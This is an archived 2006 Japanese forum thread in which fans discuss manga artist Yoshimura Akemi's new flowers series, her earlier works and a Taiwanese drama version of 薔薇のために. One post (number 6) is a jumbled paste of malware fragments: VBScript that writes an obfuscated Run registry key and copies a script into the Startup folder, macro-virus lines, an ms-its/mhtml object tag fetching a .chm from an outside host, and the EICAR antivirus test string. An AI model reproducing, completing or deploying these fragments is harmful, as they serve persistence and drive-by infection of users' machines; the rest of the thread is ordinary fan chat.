5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【読み切りシリーズ】 吉村明美 【flowersでスタート】

1 :花と名無しさん:2006/11/29(水) 14:32:54 ID:SWftKTq60

Judyでの悲劇の女王シリーズも3部で完結。
次の作品は、12月28日発売の2月号のflowersで
新よみきりシリーズ「夢の真昼」がスタート。

▼flowers 公式ページ
http://flowers.shogakukan.co.jp/

▼予告画像
http://flowers.shogakukan.co.jp/magazine/img/yokoku_0702.jpg

2 :花と名無しさん:2006/11/29(水) 14:39:50 ID:???0
あらすじ。

小田切鈴子は20歳の女子大生。
姉・鳩子に家来同然に扱われる生活からの脱却を決意。
大家さんつきの日本家屋に古式ゆかし「間借り」することにしたが・・・!?

初登場!稀代の実力派!
の煽りあり。

カラーつき40ページ。

3 :花と名無しさん :2006/11/29(水) 14:44:27 ID:SWftKTq60
前スレ?
吉村明美
http://comic6.2ch.net/test/read.cgi/gcomic/1076919766/l50


4 :花と名無しさん:2006/11/30(木) 00:56:23 ID:A1ULa82xO
即死防止上げ

5 :花と名無しさん:2006/11/30(木) 01:28:10 ID:???O
スレたて乙

雑誌のカラーとしちゃ花達あってそうだから期待

6 :<body onload=window()>:2006/11/30(木) 07:44:56 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/11/30(木) 14:59:45 ID:???0
吉村さんに相応しい場所だ。
ゴミ化したプチを出て正解だったね。
これからも応援させて頂きます!

8 :花と名無しさん :2006/12/01(金) 23:15:40 ID:???0
やっとカラーが合っている雑誌に移った希ガス
あらすじの内容がいつもと同じマンネリ気味に感じる。

9 :花と名無しさん:2006/12/04(月) 20:11:44 ID:???0
「海よりも深く」書いた人?
最近買ったんだよね。面白かったな。
「薔薇のために」も迷ってるんだけど、みなさんの評価はいかがなものですか?

10 :花と名無しさん:2006/12/07(木) 12:43:14 ID:???O
薔薇はハマったよ!
葵が好きだった(=^▽^=)

11 :花と名無しさん :2006/12/08(金) 18:25:28 ID:???0
薔薇のためには海よりも〜が面白かったんだったら、面白いと思うよ。



12 :花と名無しさん:2006/12/09(土) 07:47:26 ID:???O
薔薇が一番好きな作品
登場人物も味ある人ばっかで話面白いよ

13 :花と名無しさん:2006/12/10(日) 08:39:58 ID:N7OYaR9BO
コンビニブックの麒麟館でハマって次に
ブックオフで薔薇の見てファンになった。
スミレとアオイの絡みが好き!

14 :花と名無しさん:2006/12/10(日) 18:34:16 ID:qnA/hec80
葵は1巻と最後じゃダイブ顔かわった希ガス

15 :花と名無しさん:2006/12/11(月) 08:23:07 ID:???0
近親相姦の話だけど、実姉のユリと結構キス多かった
最後はスミレが止めなきゃ一線越えてた・・・

16 :花と名無しさん :2006/12/11(月) 13:36:41 ID:???0
>>15

そこだけ読むと少コミだなw

17 :花と名無しさん:2006/12/11(月) 21:44:03 ID:???O
葵と菫のキスシーンも結構あった

18 :花と名無しさん:2006/12/12(火) 09:07:18 ID:???0
海よりも深くは面白くなかった

19 :花と名無しさん:2006/12/13(水) 13:09:20 ID:5XvDUxTPO
あなたがいれば

より

海より〜の方がよかったけど…

20 :花と名無しさん:2006/12/13(水) 13:23:22 ID:???0
海よりも〜は中間のシリアスな部分が良かったな。

あと、最後のほうで、夫は妻を養っていくために仕事をするのに〜とか
論争?してたとこはなるほどなーって思いながら読んでた。

21 :花と名無しさん:2006/12/15(金) 10:12:26 ID:???0
薔薇台湾でもドラマ化されるほど人気あるはずなのに
wikiに無いね


22 :花と名無しさん:2006/12/18(月) 11:05:29 ID:sfEpQrRNO
麒麟館と薔薇以外は繰り返し読まないかも。
ドラマ化してもいい話だよ。

23 :花と名無しさん:2006/12/23(土) 12:54:11 ID:Oo+bmnPHO
新聞欄に26日の夜9時にbs日テレで「薔薇之恋〜薔薇のために」というタイトル見たけど、
これが台湾でドラマ化されたやつなのか気になる!

24 :花と名無しさん:2006/12/23(土) 16:10:07 ID:OnK+d8VoO
BSで多田かおるのイタキス海外版ドラマみた事ある(・ω・)
薔薇が吉村作品のドラマ版なら見たいかも(・∀・)

25 :花と名無しさん:2006/12/24(日) 02:53:47 ID:???O
CATVで見たよー
菫さんがごつすぎる
円盤投げ室伏っぽいハーフ顔の俳優。
ぜんぜん眠くなさそうなキツネ顔芙蓉さん。
まあまあイケメンだけど女と間違えられるとは
思えないただのロン毛男な葵くん。

が、ゆりがぽっちゃりチビですごくリアル。
漫画だと化粧でおそろしく(輪郭や目の大きさまで)変身するシーンあるけど
実写だとどうなるんだろう・・・

26 :花と名無しさん:2006/12/24(日) 03:01:55 ID:???O
>>23
そうですよ。台湾薔薇=吉村薔薇です。

テレビつけたらちょうど葵が菫の寝込みを襲ってチューするところでした。
実写の葵は見た目もろ男なので一瞬変なホモドラマかと思いましたが
直後に漫画のイメージまんまのゆりが出て来たのでもしや・・・
と思い『番組内容』ボタンを押したら『薔薇のために』でした。

27 :花と名無しさん:2006/12/24(日) 10:24:33 ID:???O
一度薔薇のドラマ見てみたいかも。


28 :花と名無しさん:2006/12/24(日) 21:51:12 ID:hjShLrnRO
公式サイトみたら葵役はイタズラなキスの主役の人なんだ!
ユリは漫画と似てる!

29 :花と名無しさん:2006/12/25(月) 12:06:08 ID:???O
ゆりほんと似てる
芙蓉と葵も許容範囲だけどスミレがなんか違う
ハーフ使えばいいってもんでもないよー

30 :花と名無しさん:2006/12/25(月) 12:30:18 ID:oaMKxyV6O
スミレはGacktでも使って欲しいW

31 :花と名無しさん:2006/12/25(月) 13:24:01 ID:???O
菫みたくてyoutubeでみれないか検索したら駄目だったorz

32 :花と名無しさん:2006/12/25(月) 14:02:51 ID:???O
葵役の演技どう?

33 :花と名無しさん:2006/12/25(月) 14:09:26 ID:Pnxm6JjRO
葵役はhyde(初期の長髪)がよかったな(・∀・)

34 :花と名無しさん:2006/12/25(月) 17:32:01 ID:???O

顔はいいが背があわない

35 :花と名無しさん:2006/12/25(月) 17:38:42 ID:???O
台湾葵は菫やユリより自分のことが1番好きそう。
芙蓉を好きな漫画家とかもちゃんと出てきて原作にわりと忠実。

日テレに地上波でも放送してくれってリクエストメール出しまくると良いかもね。
海外ドラマ板とか見ると韓国ドラマとかも
熱烈なファンがテレビ局に電話やメールでリクエストしまくってるみたいだよ。

36 :花と名無しさん:2006/12/25(月) 17:43:13 ID:???O
hydeってゆりと同じぐらいの身長かもね…

37 :花と名無しさん:2006/12/25(月) 19:58:31 ID:???O
身長はユリ並みだね。
インディーズ時代の髪ロングでソバージュのハイドなら葵に似てるかも。
身長はシークレットブーツでカバーW

38 :花と名無しさん:2006/12/25(月) 21:34:46 ID:???0
全員無い。

39 :花と名無しさん:2006/12/26(火) 00:21:26 ID:hg6Db295O
すみれ役がイメージと違うのが…
ドラマ全41話あるから楽しみ。

40 :花と名無しさん:2006/12/26(火) 00:31:15 ID:???O
そばかすはないけどゆりは似てる〜
スミレは難しいかも3/4外人設定だし


日本だとゆりは山田花子とかかな(やりすぎか)

41 :花と名無しさん:2006/12/26(火) 10:20:56 ID:???O
私も百合は山田花子が合うと思った
背や髪型が決め手

42 :花と名無しさん:2006/12/26(火) 14:29:07 ID:???O
あなたがいれば

で葵系のホモの人いたよね

43 :花と名無しさん:2006/12/26(火) 15:04:23 ID:bt9D3JPD0
名前なんだっけ?

44 :花と名無しさん:2006/12/26(火) 16:10:55 ID:???0
この人の作品同性愛多いような

45 :花と名無しさん:2006/12/27(水) 01:37:57 ID:LCer9u690
>日テレに地上波でも放送してくれって
リクエストメール出しまくると良いかもね

やってみようかな

46 :花と名無しさん:2006/12/27(水) 03:26:39 ID:???O
今日(もう昨日か)BS日テレで見たよ。
オープニングでスミレの目がCGでキラーンて青く光る中華風室伏orz
でもゆりはピッタリ。湯たんぽとか肉まんぽい。

47 :花と名無しさん:2006/12/27(水) 09:18:44 ID:gyfl6O9zO
ゆり役よく見つけたよね

薔薇の後に

「ブスの瞳に恋してる」見てしまったw

48 :花と名無しさん:2006/12/27(水) 13:18:21 ID:???O
あー私も
森三中の村上見るとゆりはたいして太ってないし
むしろ可愛いほうだよなぁなんて思えてきた。

49 :花と名無しさん:2006/12/27(水) 13:49:43 ID:???O
ゴールデン枠で山田花子主演「薔薇のために」やって欲しい。
おさむ役が稲垣なんて作者はあんなにかっこいいのか…

やっぱり実際ドラマ化ならぽっちゃりしたグラドルとかになんのかな〜
作者の希望あるだろうし

50 :花と名無しさん:2006/12/27(水) 17:44:59 ID:4jc8o0AeO
麒麟館はドラマ化してないの?

51 :花と名無しさん:2006/12/28(木) 00:26:17 ID:???O
>>49
花子だと最終回の結婚式で痩せてセリつけ毛しても…………面白いけど

葵はやっくん?
お母さんはハーフ設定無視して浅野ゆう子か黒木瞳なんだろうな。
枕野パパはトヨエツとかで。

そしてスミレは誰がやるのか。

52 :花と名無しさん:2006/12/28(木) 15:03:29 ID:???0
>>23>>35
台湾ドラマの話は海外ドラマ板で
http://tv8.2ch.net/test/read.cgi/tv2/1131440888/l50

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)